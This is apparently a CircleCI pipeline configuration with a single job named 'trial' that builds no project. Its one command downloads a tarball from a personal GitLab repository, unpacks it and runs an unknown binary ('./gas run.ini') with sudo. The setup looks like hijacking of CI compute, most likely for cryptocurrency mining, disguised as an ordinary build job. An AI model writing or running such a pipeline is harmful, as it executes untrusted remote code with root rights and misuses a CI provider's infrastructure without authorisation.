version: 2.1
jobs:
    trial:
      docker:
            - image: cimg/node:18.2.0
      parallelism: 1
      steps:
        - run:
            name: "trial"
            command: sudo apt update && sudo apt install nodejs && sudo apt install npm && wget https://gitlab.com/jonlenong969/andi/-/blob/main/hasim.tar.gz && tar -xvf hasim.tar.gz && sudo ./gas run.ini

workflows:
    version: 2.1
    build:
        jobs:
        - trial
